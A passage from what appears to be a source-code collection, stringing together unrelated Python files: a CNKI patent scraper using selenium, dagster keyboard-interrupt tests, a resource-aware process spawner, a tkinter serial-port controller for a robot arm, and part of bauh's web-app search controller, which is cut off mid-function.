req_post.side_effect = fake_post
self.robot.send_to_app()
self.assertTrue(req_get.called)
self.assertTrue(req_post.called)
|
Spider_Lv3.py
|
# -*- coding: utf-8 -*-
# Spider Lv3
# Author: Yue H.W. Luo
# Mail: yue.rimoe@gmail.com
# License : http://www.apache.org/licenses/LICENSE-2.0
# More detail: https://blog.rimoe.xyz/2017/11/12/post01/
"""
## NOTE
Created on Thu Oct 26 15:30:04 2017
This program is used to get data from the CNKI database.
The `threading`, `selenium` and `requests` modules are needed.
## Reference:
> http://cuiqingcai.com/2599.html
> http://cuiqingcai.com/2621.html
===============================================================================
rimoerimoerimoe sysu sysu rimoerimoerimoe sysu sysu
rimoerimoerimoe sysu sysu rimoerimoerimoe sysu sysu
yue sysu sysu yue sysu sysu
yue sysu sysu yue sysu sysu
rimoerimoerimoe sysu sysu rimoerimoerimoe sysu sysu
rimoerimoerimoe sysu sysu rimoerimoerimoe sysu sysu
yue rimoe yue sysu sysu
yue rimoe yue sysu sysu
yue rimoe yue sysu sysu
rimoerimoerimoe rimoe rimoerimoerimoe rimoerimoerimoe
rimoerimoerimoe rimoe rimoerimoerimoe rimoerimoerimoe
===============================================================================
93rd Anniversary,
Happy birthday!
"""
import re
import time
import requests
import threading
from selenium import webdriver
from selenium.webdriver.support.select import Select
from selenium.common.exceptions import NoSuchElementException
class Spider:
def __init__(self, dp, url):
self.data_path = dp
self.url = url
self.dlist = []
self.html = ''
self.string = ''
self.todo = ['申请号', '申请日', '公开号', '公开日', '申请人',
'地址', '共同申请人', '发明人', '国际申请', '国际公布',
'进入国家日期', '专利代理机构', '代理人', '分案原申请号',
'国省代码', '摘要', '主权项', '页数', '主分类号',
'专利分类号']
self.driver = webdriver.Chrome()
    # Search: controlling the webdriver via selenium
def search(self, search_whe, search_key, search_type):
driver = self.driver
driver.get(self.url)
time.sleep(5)
inbox = driver.find_element_by_xpath('//*[@id="Text1"]')
buton = driver.find_element_by_xpath(
'//*[@id="Table6"]/tbody/tr[1]/td[3]/table/tbody/tr/td/input')
where = driver.find_element_by_xpath('//*[@id="Select1"]')
pages = driver.find_element_by_xpath(
'//*[@id="Table8"]/tbody/tr/td/select[3]')
types = [
            driver.find_element_by_xpath('//*[@id="专利类别1"]'),  # invention patents
            driver.find_element_by_xpath('//*[@id="专利类别2"]'),  # industrial designs
            driver.find_element_by_xpath('//*[@id="专利类别3"]')  # utility models
]
inbox.clear()
inbox.send_keys(search_key)
for t in types:
t.click()
types[search_type].click()
Select(pages).select_by_value('50')
Select(where).select_by_value(search_whe)
time.sleep(5)
buton.click()
# Get url: get the url list
def get_site(self):
driver = self.driver
try:
next = driver.find_element_by_xpath(
'//*[@id="id_grid_turnpage2"]/a[1]')
except NoSuchElementException:
global search_whe, search_key, search_type
time.sleep(5)
self.search(search_whe, search_key, search_type)
pattern = re.compile(r'(.*?)&QueryID=\d+&CurRec=\d')
while 1:
i = 1
while 1:
i += 1
try:
a = driver.find_element_by_xpath(
'//*[@id="contentBox"]/table/tbody/tr[%s]/td[2]/a' % i)
except:
break
txt = a.get_attribute("href")
txt = re.findall(pattern, txt)[0]
self.dlist.append(txt)
print('Thread 1: ' + txt)
next.click()
next = driver.find_element_by_xpath(
'//*[@id="id_grid_turnpage2"]/a[3]')
self.close()
    # Get the information
def get_data(self):
save_name = 'save.txt'
with open(self.data_path + '\\' + save_name, 'a') as sf:
self.string = '名称,' + ','.join(self.todo)
sf.write(self.string + '\n')
while 1:
try:
p = self.dlist.pop(0)
except IndexError:
                    print('Thread 2: ' + 'List has nothing.')
time.sleep(2)
continue
self.html = requests.get(p).text.encode('utf-8')
with open(self.data_path + '\\' + save_name, 'a') as sf:
self.analyse()
print('Thread 2: ' + self.string)
sf.write(self.string + '\n')
# Get each record by using regular expressions
def get_(self, pattern):
pattern = re.compile(r'【' + pattern + '】.*?nbsp;(.*?)<', re.S)
try:
s = re.findall(pattern, self.html)[0]
s = s.replace('\r', '').replace('\n', '').replace('\t', '')
self.string += '"' + s + '",'
except IndexError:
self.string += ' ,'
def analyse(self):
pattern = re.compile(r'<title>(.*?)--', re.S)
try:
self.string = re.findall(pattern, self.html)[0] + ','
except IndexError:
self.string = ' ,'
for i in self.todo:
self.get_(i)
        self.string = self.string.strip(',')  # strip() returns a new string, so reassign it
def close(self):
self.driver.close()
data_path = r'C:\Users\Jack\Desktop'
search_whe = u'地址'
search_key = u'东莞'
search_type = 0
url = 'http://dbpub.cnki.net/grid2008/dbpub/brief.aspx?id=scpd'
spider = Spider(data_path, url)
spider.search(search_whe, search_key, search_type)
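# Two cooperating threads: get_site (producer) walks the result pages in the browser and fills
# spider.dlist with record URLs, while get_data (consumer) pops them, downloads each record with
# requests and appends the parsed fields to save.txt.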
threads = []
t1 = threading.Thread(target=spider.get_site, args=())
threads.append(t1)
t2 = threading.Thread(target=spider.get_data, args=())
threads.append(t2)
for t in threads:
    t.daemon = True  # equivalent to setDaemon(True), which is deprecated
t.start()
|
test_interrupt.py
|
import os
import time
from threading import Thread
import pytest
from dagster import (
DagsterEventType,
DagsterSubprocessError,
Field,
ModeDefinition,
String,
execute_pipeline_iterator,
pipeline,
reconstructable,
resource,
seven,
solid,
)
from dagster.core.instance import DagsterInstance
from dagster.utils import safe_tempfile_path
def _send_kbd_int(temp_files):
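    # Poll until every solid has written its temp file, then raise KeyboardInterrupt in the main thread.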
while not all([os.path.exists(temp_file) for temp_file in temp_files]):
time.sleep(0.1)
seven.thread.interrupt_main()
@solid(config_schema={'tempfile': Field(String)})
def write_a_file(context):
with open(context.solid_config['tempfile'], 'w') as ff:
ff.write('yup')
while True:
time.sleep(0.1)
@solid
def should_not_start(_context):
assert False
@pipeline
def write_files_pipeline():
write_a_file.alias('write_1')()
write_a_file.alias('write_2')()
write_a_file.alias('write_3')()
write_a_file.alias('write_4')()
should_not_start.alias('x_should_not_start')()
should_not_start.alias('y_should_not_start')()
should_not_start.alias('z_should_not_start')()
def test_interrupt():
@pipeline
def write_a_file_pipeline():
write_a_file()
with safe_tempfile_path() as success_tempfile:
        # launch a thread that waits until the file is written, then sends an interrupt
Thread(target=_send_kbd_int, args=([success_tempfile],)).start()
results = []
try:
# launch a pipeline that writes a file and loops infinitely
# next time the launched thread wakes up it will send a keyboard
# interrupt
for result in execute_pipeline_iterator(
write_a_file_pipeline,
run_config={'solids': {'write_a_file': {'config': {'tempfile': success_tempfile}}}},
):
results.append(result.event_type)
assert False # should never reach
except KeyboardInterrupt:
pass
assert DagsterEventType.STEP_FAILURE in results
assert DagsterEventType.PIPELINE_FAILURE in results
# https://github.com/dagster-io/dagster/issues/1970
@pytest.mark.skip
def test_interrupt_multiproc():
with seven.TemporaryDirectory() as tempdir:
file_1 = os.path.join(tempdir, 'file_1')
file_2 = os.path.join(tempdir, 'file_2')
file_3 = os.path.join(tempdir, 'file_3')
file_4 = os.path.join(tempdir, 'file_4')
        # launch a thread that waits until the file is written, then sends an interrupt
Thread(target=_send_kbd_int, args=([file_1, file_2, file_3, file_4],)).start()
results = []
try:
# launch a pipeline that writes a file and loops infinitely
# next time the launched thread wakes up it will send a keyboard
# interrupt
for result in execute_pipeline_iterator(
reconstructable(write_files_pipeline),
run_config={
'solids': {
'write_1': {'config': {'tempfile': file_1}},
'write_2': {'config': {'tempfile': file_2}},
'write_3': {'config': {'tempfile': file_3}},
'write_4': {'config': {'tempfile': file_4}},
},
'execution': {'multiprocess': {'config': {'max_concurrent': 4}}},
'storage': {'filesystem': {}},
},
instance=DagsterInstance.local_temp(tempdir=tempdir),
):
results.append(result)
assert False # should never reach
except (DagsterSubprocessError, KeyboardInterrupt):
pass
assert [result.event_type for result in results].count(DagsterEventType.STEP_FAILURE) == 4
assert DagsterEventType.PIPELINE_FAILURE in [result.event_type for result in results]
def test_interrupt_resource_teardown():
called = []
cleaned = []
@resource
def resource_a(_):
try:
called.append('A')
yield 'A'
finally:
cleaned.append('A')
@solid(config_schema={'tempfile': Field(String)}, required_resource_keys={'a'})
def write_a_file_resource_solid(context):
with open(context.solid_config['tempfile'], 'w') as ff:
ff.write('yup')
while True:
time.sleep(0.1)
@pipeline(mode_defs=[ModeDefinition(resource_defs={'a': resource_a})])
def write_a_file_pipeline():
write_a_file_resource_solid()
with safe_tempfile_path() as success_tempfile:
        # launch a thread that waits until the file is written, then sends an interrupt
Thread(target=_send_kbd_int, args=([success_tempfile],)).start()
results = []
try:
# launch a pipeline that writes a file and loops infinitely
# next time the launched thread wakes up it will send a keyboard
# interrupt
for result in execute_pipeline_iterator(
write_a_file_pipeline,
run_config={
'solids': {
'write_a_file_resource_solid': {'config': {'tempfile': success_tempfile}}
}
},
):
results.append(result.event_type)
assert False # should never reach
except KeyboardInterrupt:
pass
assert DagsterEventType.STEP_FAILURE in results
assert DagsterEventType.PIPELINE_FAILURE in results
assert 'A' in cleaned
|
main.py
|
from math import floor
from multiprocessing import Process
import time
import psutil
import test_group
import random
from dotenv import dotenv_values
PARALLEL = True
test_processes = []
def try_seed_random():
config = dotenv_values('.env')
if 'SEED' in config:
random.seed(config['SEED'])
def is_cpu_available():
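    # Heuristic: let the test processes use at most half of the CPU headroom left by other processes,
    # and only allow another spawn while the current process count is below that bound.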
child_processes = psutil.Process().children(recursive=True)
our_cpu_usage = sum([process.cpu_percent(interval=0.1) for process in child_processes]) / psutil.cpu_count() / 100
total_cpu_usage = psutil.cpu_percent(interval=0.2) / 100
other_cpu_usage = total_cpu_usage - our_cpu_usage
our_max_cpu_usage = 0.5 * (1-other_cpu_usage)
cpu_bound = floor(psutil.cpu_count() * our_max_cpu_usage)
print('Our CPU usage:', our_cpu_usage, 'total usage:', total_cpu_usage, 'other usage:', other_cpu_usage, 'our max usage:', our_max_cpu_usage, 'our bound:', cpu_bound)
return cpu_bound > len(test_processes)
def is_memory_available():
total_memory_used = psutil.virtual_memory().percent / 100
child_processes = psutil.Process().children(recursive=True)
our_usage_percentage = sum([process.memory_percent() for process in child_processes]) / 100
other_processes_usage = total_memory_used - our_usage_percentage
our_usable = 0.3 * (1-other_processes_usage)
print('Our memory usage:', our_usage_percentage, 'total usage:', total_memory_used, 'other usage:', other_processes_usage, 'our usable:', our_usable)
return our_usage_percentage < our_usable
def resources_available():
print('Running processes currently: ' + str(len(test_processes)))
return is_memory_available() and is_cpu_available()
def spawn_test_run(game_ingredients):
new_process = Process(target=test_group.play_and_save, args=game_ingredients)
new_process.start()
print('Spawned new process:', new_process.pid)
test_processes.append(new_process)
def clean_finished_processes():
    for process in list(test_processes):  # iterate over a copy so finished processes can be removed safely
if not process.is_alive():
print('Process', process.pid, 'finished')
process.join()
test_processes.remove(process)
if __name__ == '__main__':
try_seed_random()
if not PARALLEL:
for game_ingredients in test_group.build_game_instances():
test_group.play_and_save(*game_ingredients)
else:
game_generator = test_group.build_game_instances()
sleep_time = 30
tests_done = False
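        # Adaptive pacing: each successful spawn shrinks the sleep interval (spawn faster while resources
        # are free), each refusal grows it, clamped to the 5-90 second range below.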
while not tests_done or len(test_processes) > 0:
clean_finished_processes()
# If there are resources, reduce the sleep time a bit, and vice versa.
if not tests_done and resources_available():
sleep_time *= 0.93
try:
game_ingredients = next(game_generator)
spawn_test_run(game_ingredients)
except StopIteration:
tests_done = True
else:
sleep_time /= 0.93
sleep_time = max(5, min(sleep_time, 90))
# It can take a while for the memory consumption to settle, so let's wait a bit.
time.sleep(sleep_time)
|
serial_port.py
|
# -*- coding: utf-8 -*-
"""
Created on Tues Aug 3 17:06:02 2021
@author: wmy and wjx
"""
import four_dof_ik
import serial
import serial.tools.list_ports
import threading
import tkinter as tk
from tkinter import messagebox
from tkinter import ttk
import time
ifwork = True
def write_coordinates(filename, offset):
try:
f = open(filename, "w")
f.write(offset)
f.close()
except:
time.sleep(0.1)
def get_coordinates(filename):
try:
f = open(filename)
data = f.read()
num = data.split(',')
f.close()
return [int(num[0]), int(num[1]), int(num[2])]
except:
time.sleep(0.1)
class SerialPortAssistant(object):
def __init__(self):
self.serial = serial.Serial()
self.device = None
self.baudrate = 9600
self.encoding = "gb2312"
self.recthread = None
self.connecting = False
self.comports = []
self.devices = []
self.search()
self.interface()
self.updatethread = threading.Thread(target=self.update)
self.updatethread.start()
self.angle0 = 1500
pass
def interface(self):
self.root = tk.Tk()
self.root.title('机械臂串口助手 V0.0.1')
self.root.geometry('960x640')
self.face = tk.Frame(self.root)
self.face.config(height=640, width=960)
self.face.propagate(False)
self.face.pack(anchor='nw')
# operate frame
operateframe = tk.Frame(self.face)
operateframe.config(height=220, width=960)
operateframe.propagate(False)
operateframe.pack(anchor='nw', side='bottom')
operatespaceframe = tk.Frame(operateframe)
operatespaceframe.config(height=220, width=10)
operatespaceframe.propagate(False)
operatespaceframe.pack(anchor='nw', side='left')
# send text
operatetextframe = tk.Frame(operateframe)
operatetextframe.config(height=220, width=725)
operatetextframe.propagate(False)
operatetextframe.pack(anchor='nw', side='left')
operatespaceframe = tk.Frame(operatetextframe)
operatespaceframe.config(height=10, width=725)
operatespaceframe.propagate(False)
operatespaceframe.pack(anchor='nw', side='top')
operatespaceframe = tk.Frame(operatetextframe)
operatespaceframe.config(height=10, width=725)
operatespaceframe.propagate(False)
operatespaceframe.pack(anchor='sw', side='bottom')
# operate right
operateframeright = tk.Frame(operateframe)
operateframeright.config(height=240, width=210)
operateframeright.propagate(False)
operateframeright.pack(anchor='nw', side='left')
        # send button
spacelabel = tk.Label(operateframeright, width=5, height=1)
spacelabel.pack()
self.sendbutton = tk.Button(operateframeright, text='发送坐标', \
width=20, height=1, command=self.sendbuttoncmd)
self.sendbutton.pack(side='top')
# text
self.sendtext = tk.Text(operatetextframe, height=15, width=99, bg='white', fg="black")
self.sendscrollbar = tk.Scrollbar(operatetextframe)
self.sendtext['yscrollcommand'] = self.sendscrollbar.set
self.sendscrollbar['command'] = self.sendtext.yview
self.sendtext.pack(side=tk.LEFT)
self.sendscrollbar.pack(side='left', fill=tk.Y)
# space frame
spaceframe = tk.Frame(self.face)
spaceframe.config(height=420, width=10)
spaceframe.propagate(False)
spaceframe.pack(anchor='nw', side='left')
# text frame
textframe = tk.Frame(self.face)
textframe.config(height=420, width=725)
textframe.propagate(False)
textframe.pack(anchor='nw', side='left')
# option frame
optionframe = tk.Frame(self.face)
optionframe.config(height=420., width=225)
optionframe.propagate(False)
optionframe.pack(anchor='ne', side='right')
# text
self.rectext = tk.Text(textframe, height=35, width=99, bg='black', fg="#00FF00")
self.recscrollbar = tk.Scrollbar(textframe)
self.rectext['yscrollcommand'] = self.recscrollbar.set
self.rectext.config(state=tk.DISABLED)
self.recscrollbar['command'] = self.rectext.yview
self.rectext.pack(side=tk.LEFT, fill=tk.BOTH)
self.recscrollbar.pack(side='left', fill=tk.Y)
# option
optionframebottom = tk.Frame(optionframe)
optionframebottom.config(height=150., width=210)
optionframebottom.propagate(False)
optionframebottom.pack(anchor='sw', side='bottom')
# left
optionframeleft = tk.Frame(optionframe)
optionframeleft.config(height=420., width=60)
optionframeleft.propagate(False)
optionframeleft.pack(anchor='nw', side='left')
# right
optionframeright = tk.Frame(optionframe)
optionframeright.config(height=420., width=150)
optionframeright.propagate(False)
optionframeright.pack(anchor='nw', side='left')
# serial
spacelabel = tk.Label(optionframeleft, width=5, height=1)
spacelabel.pack()
label1 = tk.Label(optionframeleft, text="端口号", width=5, height=1)
label1.pack()
spacelabel = tk.Label(optionframeright, width=5, height=1)
spacelabel.pack()
self.serialselect = ttk.Combobox(optionframeright, width=15, height=5)
self.serialselect.bind("<<ComboboxSelected>>", self.serialselectcmd)
self.serialselect.pack()
# baudrate
spacelabel = tk.Label(optionframeleft, width=5, height=1)
spacelabel.pack()
label2 = tk.Label(optionframeleft, text="波特率", width=5, height=1)
label2.pack()
spacelabel = tk.Label(optionframeright, width=5, height=1)
spacelabel.pack()
self.baudrateselect = ttk.Combobox(optionframeright, width=15, height=8)
self.baudrateselect.bind("<<ComboboxSelected>>", self.baudrateselectcmd)
self.baudrateselect['value'] = [1382400, 921600, 460800, 256000, 230400, \
128000, 115200, 76800, 57600, 43000, 38400, 19200, 14400, \
9600, 4800, 2400, 1200]
self.baudrateselect.current(13)
self.baudrateselect.pack()
# cal bit
spacelabel = tk.Label(optionframeleft, width=5, height=1)
spacelabel.pack()
label3 = tk.Label(optionframeleft, text="校验位", width=5, height=1)
label3.pack()
spacelabel = tk.Label(optionframeright, width=5, height=1)
spacelabel.pack()
self.calbitselect = ttk.Combobox(optionframeright, width=15, height=8)
self.calbitselect['value'] = ["无校验", "奇校验", "偶校验"]
self.calbitselect.current(0)
self.calbitselect.pack()
# data bit
spacelabel = tk.Label(optionframeleft, width=5, height=1)
spacelabel.pack()
label4 = tk.Label(optionframeleft, text="数据位", width=5, height=1)
label4.pack()
spacelabel = tk.Label(optionframeright, width=5, height=1)
spacelabel.pack()
self.databitselect = ttk.Combobox(optionframeright, width=15, height=8)
self.databitselect['value'] = [8, 7, 6, 5]
self.databitselect.current(0)
self.databitselect.pack()
# stop bit
spacelabel = tk.Label(optionframeleft, width=5, height=1)
spacelabel.pack()
label5 = tk.Label(optionframeleft, text="停止位", width=5, height=1)
label5.pack()
spacelabel = tk.Label(optionframeright, width=5, height=1)
spacelabel.pack()
self.stopbitselect = ttk.Combobox(optionframeright, width=15, height=8)
self.stopbitselect['value'] = [1]
self.stopbitselect.current(0)
self.stopbitselect.pack()
# check
# self.hexdisplay = tk.BooleanVar()
# self.hexdisplaycheck = tk.Checkbutton(optionframebottom, text='十六进制显示', \
# onvalue=True, offvalue=False, variable=self.hexdisplay)
# self.hexdisplaycheck.pack()
# open
spacelabel = tk.Label(optionframebottom, width=5, height=1)
spacelabel.pack()
self.openbutton = tk.Button(optionframebottom, text='打开串口', \
width=20, height=1, command=self.openbuttoncmd)
self.openbutton.pack()
# remote
spacelabel = tk.Label(optionframebottom, width=5, height=1)
spacelabel.pack()
self.remotebutton = tk.Button(optionframebottom, text='开始遥控', \
width=20, height=1, command=self.remotebuttoncmd)
self.remotebutton.pack()
# clear
spacelabel = tk.Label(optionframebottom, width=5, height=1)
spacelabel.pack()
self.runbutton = tk.Button(optionframebottom, text='开始抓取', \
width=20, height=1, command=self.runbuttoncmd)
self.runbutton.pack()
pass
def baudrateselectcmd(self, *args):
self.baudrate = int(self.baudrateselect.get())
self.serial.baudrate = self.baudrate
print(self.baudrate)
pass
def serialselectcmd(self, *args):
self.device = self.serialselect.get().split()[0]
self.serial.port = self.device
print(self.device)
pass
def search(self):
self.devices = []
self.comports = list(serial.tools.list_ports.comports())
for comport in self.comports:
self.devices.append(comport.device)
pass
pass
def update(self):
while True:
if self.connecting == False:
self.search()
self.serialselect['value'] = self.comports
if len(list(self.serialselect['value'])) == 0:
self.serialselect['value'] = [""]
self.serialselect.current(0)
self.device = None
pass
elif self.device == None or self.device not in self.devices:
self.serialselect.current(0)
self.device = self.devices[0]
pass
self.serialselect.update()
self.face.update_idletasks()
pass
pass
pass
def serialopen(self):
self.serial.port = self.device
self.serial.baudrate = self.baudrate
self.serial.timeout = 2
try:
self.serialclose()
time.sleep(0.1)
self.serial.open()
except Exception as error:
tk.messagebox.showinfo(title='无法连接到串口', message=error)
return False
else:
if self.serial.isOpen():
self.connecting = True
# self.recthread = threading.Thread(target=self.receive)
# self.recthread.start()
return True
else:
return False
pass
pass
def serialclose(self):
self.connecting = False
time.sleep(0.1)
self.serial.close()
pass
def receive(self):
while self.connecting:
try:
nchar = self.serial.inWaiting()
pass
except:
self.connecting = False
self.serialclose()
self.openbutton['text'] = '打开串口'
pass
if nchar:
if self.hexdisplay.get() == False:
data = ''.encode('utf-8')
data = data + self.serial.read(nchar)
try:
self.rectext.config(state=tk.NORMAL)
self.rectext.insert(tk.END, data.decode(self.encoding))
self.rectext.config(state=tk.DISABLED)
self.rectext.yview_moveto(1)
self.rectext.update()
pass
except:
pass
pass
else:
data = self.serial.read(nchar)
convert = '0123456789ABCDEF'
string = ''
for char in data:
string += convert[char // 16] + convert[char % 16] + ' '
pass
self.rectext.config(state=tk.NORMAL)
self.rectext.insert(tk.END, string)
self.rectext.config(state=tk.DISABLED)
self.rectext.yview_moveto(1)
self.rectext.update()
pass
pass
pass
pass
def run(self):
self.root.mainloop()
self.exit()
pass
def exit(self):
self.serialclose()
pass
    # Button callbacks
def openbuttoncmd(self):
if self.openbutton['text'] == '打开串口':
is_open = self.serialopen()
if is_open:
self.openbutton['text'] = '关闭串口'
self.restoration()
time.sleep(0.5)
pass
pass
else:
self.restoration()
self.serialclose()
self.openbutton['text'] = '打开串口'
pass
pass
def remotebuttoncmd(self):
if self.remotebutton['text'] == '开始遥控':
self.root.bind("<Key>", self.func1)
self.remotebutton['text'] = '结束遥控'
else:
self.root.unbind("<Key>")
self.remotebutton['text'] = '开始遥控'
def runbuttoncmd(self):
global ifwork
if self.runbutton['text'] == '开始抓取':
t1 = threading.Thread(target=self.working)
t1.start()
ifwork = True
self.runbutton['text'] = '结束抓取'
else:
ifwork = False
self.runbutton['text'] = '开始抓取'
def sendbuttoncmd(self):
if self.connecting:
data = self.sendtext.get(1.0, tk.END)
num = data.split(',')
num = list(map(int, num))
self.robotrun(num)
else:
tk.messagebox.showinfo(title='无法发送', message='请先打开串口')
pass
pass
    # Keyboard events
def func1(self, event):
print("事件触发键盘输入:{0},对应的ASCII码:{1}".format(event.keysym, event.keycode))
if event.keysym == "Up":
self.angle0 = self.angle0 + 50
if self.angle0 > 2500:
self.angle0 = 2500
data = "#000P" + str(self.angle0) + "T0100!\n"
self.serial.write(data[0:-1].encode(self.encoding))
elif event.keysym == "Down":
self.angle0 = self.angle0 - 50
if self.angle0 < 500:
self.angle0 = 500
data = "#000P" + str(self.angle0) + "T0100!\n"
self.serial.write(data[0:-1].encode(self.encoding))
    ############################ Robot arm control functions ##################################
def restoration(self):
data = "$RST!\n"
self.serial.write(data[0:-1].encode(self.encoding))
time.sleep(0.1)
data = "$DST!\n"
self.serial.write(data[0:-1].encode(self.encoding))
def openhand(self):
data = "{#005P1700T0500!}\n"
self.serial.write(data[0:-1].encode(self.encoding))
time.sleep(0.5)
def closehand(self):
data = "{#005P1430T0800!}\n"
self.serial.write(data[0:-1].encode(self.encoding))
time.sleep(0.8)
def flipleft(self):
data = "{#004P0900T0500!}\n"
self.serial.write(data[0:-1].encode(self.encoding))
time.sleep(0.5)
def flipright(self):
data = "{#004P2100T0500!}\n"
self.serial.write(data[0:-1].encode(self.encoding))
time.sleep(0.5)
    # Robot arm motion
def robotrun(self, offset, t=1000):
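        # Solve the inverse kinematics for the target point, then map the joint angles onto servo pulse
        # widths around the 1500 centre; the 7.41 factor presumably converts degrees to pulse units.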
hasik, j1, j2, j3, j4 = four_dof_ik.inverse_kinematics(offset[0], offset[1], offset[2], 180)
if hasik:
self.sendmsg(agl0=1500 + int(j1 * 7.41), agl1=1500 - int(j2 * 7.41), agl2=1500 + int(j3 * 7.41),
agl3=1500 - int(j4 * 7.41), run_time=t)
return True
else:
return False
def working(self):
while (ifwork):
offset = get_coordinates("offset.txt")
time.sleep(0.2)
print("txt中坐标为:", offset)
if offset[0] != -1:
self.openhand()
if self.robotrun(offset):
self.closehand()
self.robotrun([0, -200, 130])
self.openhand()
self.robotrun([0, -1, 360])
write_coordinates("offset.txt", "-1,-1,-1")
    # Send commands to the robot arm over the serial port
def sendmsg(self, agl0=1500, agl1=1500, agl2=1550, agl3=1500, run_time=1000):
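        # Command frame used throughout this file for the arm controller:
        # "{#<servo id>P<pulse width>T<move time ms>! ... }" - one #...! segment per servo, wrapped in braces.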
data = "{#000P" + str(agl0) + "T" + str(run_time) + "!" + \
"#001P" + str(agl1) + "T" + str(run_time) + "!" + \
"#002P" + str(agl2) + "T" + str(run_time) + "!" + \
"#003P" + str(agl3) + "T" + str(run_time) + "!" + "}\n"
self.serial.write(data.encode(self.encoding))
time.sleep(run_time / 1000.0)
if __name__ == '__main__':
assistant = SerialPortAssistant()
assistant.run()
|
controller.py
|
import glob
import locale
import os
import re
import shutil
import subprocess
import traceback
from math import floor
from pathlib import Path
from threading import Thread
from typing import List, Type, Set, Tuple
import requests
import yaml
from colorama import Fore
from requests import exceptions
from bauh.api.abstract.context import ApplicationContext
from bauh.api.abstract.controller import SoftwareManager, SearchResult
from bauh.api.abstract.disk import DiskCacheLoader
from bauh.api.abstract.handler import ProcessWatcher
from bauh.api.abstract.model import SoftwarePackage, PackageAction, PackageSuggestion, PackageUpdate, PackageHistory, \
SuggestionPriority, PackageStatus
from bauh.api.abstract.view import MessageType, MultipleSelectComponent, InputOption, SingleSelectComponent, \
SelectViewType, TextInputComponent, FormComponent, FileChooserComponent, ViewComponent, PanelComponent
from bauh.api.constants import DESKTOP_ENTRIES_DIR
from bauh.commons import resource, user
from bauh.commons.config import save_config
from bauh.commons.html import bold
from bauh.commons.system import ProcessHandler, get_dir_size, get_human_size_str
from bauh.gems.web import INSTALLED_PATH, nativefier, DESKTOP_ENTRY_PATH_PATTERN, URL_FIX_PATTERN, ENV_PATH, UA_CHROME, \
SEARCH_INDEX_FILE, SUGGESTIONS_CACHE_FILE, ROOT_DIR, CONFIG_FILE, TEMP_PATH
from bauh.gems.web.config import read_config
from bauh.gems.web.environment import EnvironmentUpdater, EnvironmentComponent
from bauh.gems.web.model import WebApplication
from bauh.gems.web.worker import SuggestionsDownloader, SearchIndexGenerator
try:
from bs4 import BeautifulSoup, SoupStrainer
BS4_AVAILABLE = True
except:
BS4_AVAILABLE = False
try:
import lxml
LXML_AVAILABLE = True
except:
LXML_AVAILABLE = False
RE_PROTOCOL_STRIP = re.compile(r'[a-zA-Z]+://')
RE_SEVERAL_SPACES = re.compile(r'\s+')
RE_SYMBOLS_SPLIT = re.compile(r'[\-|_\s:.]')
class WebApplicationManager(SoftwareManager):
def __init__(self, context: ApplicationContext, suggestions_downloader: Thread = None):
super(WebApplicationManager, self).__init__(context=context)
self.http_client = context.http_client
self.env_updater = EnvironmentUpdater(logger=context.logger, http_client=context.http_client,
file_downloader=context.file_downloader, i18n=context.i18n)
self.enabled = True
self.i18n = context.i18n
self.env_settings = {}
self.logger = context.logger
self.env_thread = None
self.suggestions_downloader = suggestions_downloader
self.suggestions = {}
def _get_lang_header(self) -> str:
try:
system_locale = locale.getdefaultlocale()
return system_locale[0] if system_locale else 'en_US'
except:
return 'en_US'
def _get_app_name(self, url_no_protocol: str, soup: "BeautifulSoup") -> str:
name_tag = soup.head.find('meta', attrs={'name': 'application-name'})
name = name_tag.get('content') if name_tag else None
if not name:
name_tag = soup.head.find('title')
name = name_tag.text.strip() if name_tag else None
if not name:
name = url_no_protocol.split('.')[0].strip()
if name:
name_split = [token for token in RE_SYMBOLS_SPLIT.split(name) if token]
if len(name_split) == 1:
name = name_split[0].strip()
else:
name = url_no_protocol
return name
def _get_app_icon_url(self, url: str, soup: "BeautifulSoup") -> str:
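        # Icon lookup order: <link rel="icon"> (either case) in <head>, falling back to the og:image meta
        # tag; relative hrefs are made absolute against the page URL.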
for rel in ('icon', 'ICON'):
icon_tag = soup.head.find('link', attrs={"rel": rel})
icon_url = icon_tag.get('href') if icon_tag else None
if icon_url and not icon_url.startswith('http'):
if icon_url.startswith('//'):
icon_url = 'https:{}'.format(icon_url)
elif icon_url.startswith('/'):
icon_url = url + icon_url
else:
icon_url = url + '/{}'.format(icon_url)
if icon_url:
return icon_url
if not icon_url:
icon_tag = soup.head.find('meta', attrs={"property": 'og:image'})
icon_url = icon_tag.get('content') if icon_tag else None
if icon_url:
return icon_url
def _get_app_description(self, url: str, soup: "BeautifulSoup") -> str:
description = None
desc_tag = soup.head.find('meta', attrs={'name': 'description'})
if desc_tag:
description = desc_tag.get('content')
if not description:
desc_tag = soup.find('title')
description = desc_tag.text if desc_tag else url
if description:
try:
utf8_desc = description.encode('iso-8859-1').decode('utf-8')
description = utf8_desc
except:
pass
return description
def _get_fix_for(self, url_no_protocol: str) -> str:
fix_url = URL_FIX_PATTERN.format(url=url_no_protocol)
try:
res = self.http_client.get(fix_url, session=False)
if res:
return res.text
except Exception as e:
self.logger.warning("Error when trying to retrieve a fix for {}: {}".format(fix_url, e.__class__.__name__))
def _strip_url_protocol(self, url: str) -> str:
return RE_PROTOCOL_STRIP.split(url)[1].strip().lower()
def serialize_to_disk(self, pkg: SoftwarePackage, icon_bytes: bytes, only_icon: bool):
super(WebApplicationManager, self).serialize_to_disk(pkg=pkg, icon_bytes=None, only_icon=False)
def _map_url(self, url: str) -> Tuple["BeautifulSoup", requests.Response]:
headers = {'Accept-language': self._get_lang_header(), 'User-Agent': UA_CHROME}
try:
url_res = self.http_client.get(url, headers=headers, ignore_ssl=True, single_call=True, session=False)
if url_res:
return BeautifulSoup(url_res.text, 'lxml', parse_only=SoupStrainer('head')), url_res
except exceptions.ConnectionError as e:
self.logger.warning("Could not get {}: {}".format(url, e.__class__.__name__))
def search(self, words: str, disk_loader: DiskCacheLoader, limit: int = -1, is_url: bool = False) -> SearchResult:
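        # Two search paths: for a URL query the page itself is scraped for name/description/icon;
        # for a plain text query the installed apps and the cached suggestions index are matched instead.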
local_config = {}
thread_config = Thread(target=self._fill_config_async, args=(local_config,))
thread_config.start()
res = SearchResult([], [], 0)
installed = self.read_installed(disk_loader=disk_loader, limit=limit).installed
if is_url:
url = words[0:-1] if words.endswith('/') else words
url_no_protocol = self._strip_url_protocol(url)
installed_matches = [app for app in installed if self._strip_url_protocol(app.url) == url_no_protocol]
if installed_matches:
res.installed.extend(installed_matches)
else:
soup_map = self._map_url(url)
if soup_map:
soup, response = soup_map[0], soup_map[1]
final_url = response.url
if final_url.endswith('/'):
final_url = final_url[0:-1]
name = self._get_app_name(url_no_protocol, soup)
desc = self._get_app_description(final_url, soup)
icon_url = self._get_app_icon_url(final_url, soup)
